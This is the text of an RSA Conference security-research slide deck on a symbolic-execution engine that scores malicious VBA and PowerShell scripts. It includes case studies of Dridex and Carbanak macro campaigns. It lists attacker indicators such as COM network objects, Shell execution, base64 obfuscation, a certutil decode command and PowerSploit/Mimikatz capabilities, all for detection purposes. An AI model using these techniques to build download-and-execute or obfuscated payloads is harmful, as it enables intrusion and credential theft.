SESSION ID:SESSION ID:
#RSAC
Rotem Salinas
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats
HTA-R11
Senior Security ResearcherRSA [email protected]@rotemsalinas
Uri Fleyder-KotlerAdvanced Threats Research Lab ManagerRSA [email protected]@ufleyder
#RSAC
Houston We Have a Problem
2
Agentless/non malware attacks is a rapidly growing threat
Attackers are implementing stealthier methods to bypass defenses
#RSAC
Research Goals
3
GoalsFind a way to assess a script’s “maliciousness” automaticallyDo it without the potential harm of infectionMake it fast!
Narrow the problem spaceVBA PowershellNot focused on the code extraction
The same concepts can apply to similar problems
#RSAC
The “Imaginary Engine”
4
How can we develop such 1337 imaginary engine
Problem solving in 3 basic stepsAnalyzeBrainstormingImplementation
#RSAC
The First Step – Malware Analyst Standpoint
5
DetermineExecution
FlowDeobfuscate
Find Suspicious
Activity
Traditional Static Analysis Approach
#RSAC
Perception Test – What Attackers Do?
6
#RSAC
The First Step – Understanding The Attacker’s Mindset
7
#RSAC
The First Step – Understanding The Attacker’s Mindset
8
#RSAC
The First Step – The Attacker’s Main Objectives
9
Objectives Indicators
Code execution Prerequisite, Spawning New Processes/Threads
Persistency Disk operations, Registry operations
Stealth OS manipulation
Enumeration Registry operations, Enumeration
Command & Control / Data Exfiltration Network operations
Lateral Movement Network operations, Enumeration
#RSAC
Case Study – Dridex Campaign
10
Peaked during 2015-2016
Used Macro in Office Documents to deploy Dridex variants
Targeted many companies and financial entities around the world
Delivered in a large scale Spam/Spear-Phishing campaigns
#RSAC
Case Study – Dridex Campaign
11
#RSAC
Case Study 1 – Dridex Campaign
12
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
#RSAC
Case Study 1 – Dridex Campaign
13
COM Object Creation
#RSAC
Case Study 1 – Dridex Campaign
14
URL De-Obfuscation + Http Request Creation
#RSAC
Case Study 1 – Dridex Campaign
15
Sending GET request
Initializing ADODB object to write file to disk
#RSAC
Case Study 1 – Dridex Campaign
16
Writing Response Body Data to disk
#RSAC
Case Study 1 – Dridex Campaign
17
Executing Downloaded File
#RSAC
Case Study – Anunak/Carbanak
18
Financial APT
Only 1 submission to VT
Attributed to Anunak Cybergang
Final payloadVBS/PowershellPE Executable
See Full Analysis in Appendix
#RSAC
The Second Step – Brainstorming
19
Common approaches pros and consHooking— Use available source code or patch existing dll/exe— Inserting code that would sink certain expressions— Remove potentially harmful code
Taint Analysis / Symbolic Execution— Implement an engine that would emulate the language interpreter— The engine should evaluate each line of code— Instead of invoking potentially harmful expressions it would sink them
#RSAC
We Have a Winner!
20
Symbolic ExecutionPros— Cannot harm the machine in any way (even if we missed
something)— We know exactly how it works. NO Reverse Engineering!— Not limited to specific platform/OS
Cons— Hard to Implement— Might lack some language functionality
#RSAC
Symbolic Execution: Double Sweep Method
21
First sweepGlobal context— Global variables— Code
Function declarationsExternal DLL declarations
#RSAC
Symbolic Execution: Double Sweep Method
22
Second sweepFunction code - starts with EntrypointFollows execution flowExecutes stubs instead of built-in language functionsEvaluates expressions— Math— String manipulation— Logical expressions (condition evaluation)
#RSAC
Implementation Details
23
PythonPyParsingDave Beazley’s (Python guru) PLY – Python Lex Yacc— Lex – lexical analysis/tokenizer— Yacc (Yet Another Compiler Compiler) – Syntax Analyzer
BNF – Backus Naur Form
Where to start RTFM
#RSAC
Lexical Analyzer (Tokenizer)
24
TokensLanguage keywordsImmediate values— Strings— Integer/numeric values— Floating point values— Arrays/compound data-types
Identifiers – variable names, function names, object namesOperators – math, bitwise, logical, string manipulation
* Diagram courtesy of David Beazley
#RSAC
Syntax Analyzer (Parser)
25
Parses a language syntax according to the tokenized output from the lexer
The language syntax/grammar is defined by multiple functions
Each function represents a BNF expression and will pass the parsed/extracted values to the next function inline according to the BNF statement
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
26
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
27
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
28
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
29
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
30
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
31
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
32
* Diagram courtesy of David Beazley
#RSAC
PLY Lex Example
33
* Diagram courtesy of David Beazley
#RSAC
Tokenizer Demo
34
#RSAC
PLY Yacc Example
35
* Diagram courtesy of David Beazley
#RSAC
PLY Yacc Example
36
* Diagram courtesy of David Beazley
#RSAC
PLY Yacc Example
37
* Diagram courtesy of David Beazley
#RSAC
PLY Yacc Example
38
* Diagram courtesy of David Beazley
#RSAC
PLY Yacc Example
39
* Diagram courtesy of David Beazley
#RSAC
Engine Design Overview
40
Scoring
Blacklist (score++)
Whitelist (score--)
A higher score -> more malicious
If score >= threshold Then isMalicious = True;
#RSAC
Obfuscation As Heuristics
41
Obfuscation can be a strong indicator for malicious behavior
ExamplesObject returned from function call
Object created from function call return value string
#RSAC
Obfuscation As Heuristics – More Examples
42
More ExamplesSelf modifying code (during runtime)
Data read from controls embedded in the document is considered suspicious
#RSAC
Demo The Engine
43
#RSAC
The Age Old Question of FP vs. FN
44
False positives
False negatives
Decide what works best for you!
#RSAC
Lessons Learned
45
ChallengesCondition evaluationRecursion limit
LessonsWhen in doubt bruteforce!Use the language specification guide as a guideline rather than implementingevery language feature that exists
#RSAC
Apply
46
DIY 1: Develop It Yourself
DIY 2: Deploy In Your OrganizationNetworkEndpoint
Use for your investigations
#RSAC
Q&ARotem Salinas Uri Fleyder-Kotler
@ufleyder
@rotemsalinas
#RSAC
VBA Indicators of Suspicious Activity
48
File System OperationsCOM Objects: Scripting.FileSystemObject, ADODB.StreamCmd – output redirect/copy/del/moveOpen builtin functionImporting External DLLs - URLMON
Network OperationsCOM Objects: Microsoft.XMLHTTP, WinHttp.WinHttpRequest
OS ManipulationImporting External DLLs – KERNEL32WMI Objects
RegistryImporting External DLLs – ADVAPI32
#RSAC
VBA Indicators of Suspicious Activity
49
EnumerationWMI ObjectsCmd – net share/net use/ipconfig/environment variables
Obfuscation
Self Modifying CodeEvalCodeModule
Obfuscation Beyond Reasonable Doubt
#RSAC
VBA Indicators of Suspicious Activity
50
COM Object Creation
WMI Objects Creation
Self Modifying CodeEvalCodeModule
Built-In Functions
Importing External DLL
Obfuscation Beyond Reasonable Doubt
#RSAC
VBA – COM Object Creation – Network Activity
51
Rule of thumb - If your Office Documents are communicating you are in serious troubleNetwork Activity - COM Objects
Microsoft.XMLHTTPMSXML2.SERVERXMLHTTP.6.0MSXML2.SERVERXMLHTTPMSXML2.XMLHTTPWinHttp.WinHttpRequest.5.1WinHttp.WinHttpRequestInternetExplorer.Application
#RSAC
VBA – COM Object Creation – Network Activity
52
Microsoft.XMLHTTP
WinHttp.WinHttpRequest.5.1
#RSAC
VBA – COM Object Creation – File System Activity
53
Scripting.FileSystemObject
ADODB.Stream
#RSAC
VBA – COM Object Creation – Command Execution
54
WScript.Shell
Shell.Application
#RSAC
VBA – COM Object Creation – Obfuscation
55
XStandard.Base64
MSXML2.DOMDocument.3.0
MSXML2.DOMDocument
#RSAC
VBA – Built-In Functions
56
CreateObject – Create COM object by String Object NameGetObject – Create WMI/COM objectEval – Covered In Self-ModifyingExecuteGlobal – VBS specificCallByName – Calls a Function/Method by string nameShell – Executes a CommandEnviron – Evaluates Environment VariablesKill – Deletes a FileApplication.Run – Calls a Function by String Name
#RSAC
VBA – WMI Object Creation
57
winmgmts:impersonationLevel=impersonate}!\.\root\cimv2
Examples.
.
#RSAC
VBA – Self-Modifying Code – Code Module
58
CodeModule – Allows modifications of the VBA code
#RSAC
VBA – Self-Modifying Code – Eval
59
Eval - Evaluates an expression and executes it code
ExecuteGlobal
#RSAC
VBA – Open Built-In Function
60
Write to File with Open Built-In Function
#RSAC
VBA – Importing External DLL
61
Win32 API
Examples.
.
#RSAC
Appendix – Case Study 1 A - Dridex
62
Entrypoint – This is where the code starts its execution
Non-Linear Code Execution - GoTo jumping to labels
#RSAC
Appendix – Case Study 1 A - Dridex
63
COM Object Creation
#RSAC
Appendix – Case Study 1 A - Dridex
64
URL De-Obfuscation + Http Request Creation
#RSAC
Appendix – Case Study 1 A - Dridex
65
Sending GET request
Initializing ADODB object to write file to disk
#RSAC
Appendix – Case Study 1 A - Dridex
66
Writing Response Body Data to disk
#RSAC
Appendix – Case Study 1 A - Dridex
67
Executing Downloaded File
#RSAC
Appendix – Case Study 1 B - Dridex
68
Defining Globals
Entrypoint
#RSAC
Appendix – Case Study 1 B - Dridex
69
Create obfuscated COM object
#RSAC
Appendix – Case Study 1 B - Dridex
70
Create more obfuscated COM objects
#RSAC
Appendix – Case Study 1 B - Dridex
71
Deobfuscate URL and create GET request
#RSAC
Appendix – Case Study 1 B - Dridex
72
Send GET request
#RSAC
Appendix – Case Study 1 B - Dridex
73
Receive Response Body and write to File
#RSAC
Appendix – Case Study 1 B - Dridex
74
Save To Disk
Execution
#RSAC
Appendix – Case Study 2 - Ananuk
75
Entrypoint
De-obfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
76
Beacon and Deploy final Payload
De-Obfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
77
Beacon Command & Control – Phase 1
Deobfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
78
Beacon Command & Control – Phase 2
Deobfuscate
#RSAC
Appendix – Case Study 2 - Ananuk
79
Deploy Base64 Payload
Write Base64 Decoded Payloadto Temp Path
Execute Payload
#RSAC
Appendix – Case Study 2 - Ananuk
80
Analyzing Payload 1
Payload is an iconUsed for credibility
Attempts to gain persistency on the Victim’s machine both by using knownAutorun registry paths and by creating
A scheduled task using the schtasks command
#RSAC
Appendix – Powershell Indicators of Suspicious Activity
81
.NET Objects.NET ReflectionAdd-TypeNew-Object
WinAPI32 DLL LoadingWMI Objects
Invoke-WmiMethod
Command ExecutionInvoke-Command
COM ObjectsNew-Object –Com
#RSAC
Appendix – Powershell Obfuscation
82
Obfuscation Methods
Base64
SecureString
Custom Decoding Methods
#RSAC
Powershell Techniques - .NET Reflection
83
Example 1 – LoadWithPartialName
Example 2 - LoadName
#RSAC
Powershell Techniques - Add-Type .NET code injection
84
Creation of a new type/class using .NET code
Creating an instance of the class and invoking it’s Start method
#RSAC
Powershell Techniques – New-Object
85
Creating an object instanceIn this example System.Net.WebClient instance is created in order to download a file
#RSAC
Powershell Techniques - Invoke-WmiMethod
86
Using WMI for enumeration and system maniupulationIn this case creating a key in the windows registry
#RSAC
Powershell Techniques - DLL loading
87
Resolving Native Win32 API functions
$module = “kernel32.dll”
API Function to be resolved
#RSAC
Powershell Techniques - New-Object -com
88
Similarly to the COM objects in VBAThe same COM objects can be used in Powershell using this command
#RSAC
Powershell Techniques Obfuscation
89
Obfuscation methods in PowershellAdding Ticks (Escapes special characters but ignored if used non-special characters) + Lowercase/UppercaseString Concatenation/ManipulationGet-Command + WildCards + AliasesInvoke-Expression
#RSAC
Powershell Techniques Obfuscation - Base64
90
Base64 using .NET classes
CertUtilBy Executing the certutil tool as a commandcertutil -decode encodedInputFileName decodedOutputFileName
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
91
Javascript outer script with obfuscated strings
Base64 encoded payloadsEach string in the list is reversed
A list of string includingcommands and base64
Encoded payloads
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
92
Deploys 3 Powershell scripts on the victims machine
Payload 1 – .NET code injection using Add-Type
Creation of a new type/class using .NET code
Creating an instance of the class and invoking it’s Start method
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
93
Payload 2 – .NET code injection using Add-Type like the 1st payload
Imports multiple Win32 api functions using .NET
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
94
Payload 3 – Downloads TOR Proxifier as scheduled task
#RSAC
Case Study 4 – Powersploit + Invoke-Obfuscation
95
Open source project available on GitHub
PowerSploit includes capabilities such as:Shellcode injectionReflective DLL injectionWMICode executionMimikatz – NTLM/LM password dump
Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon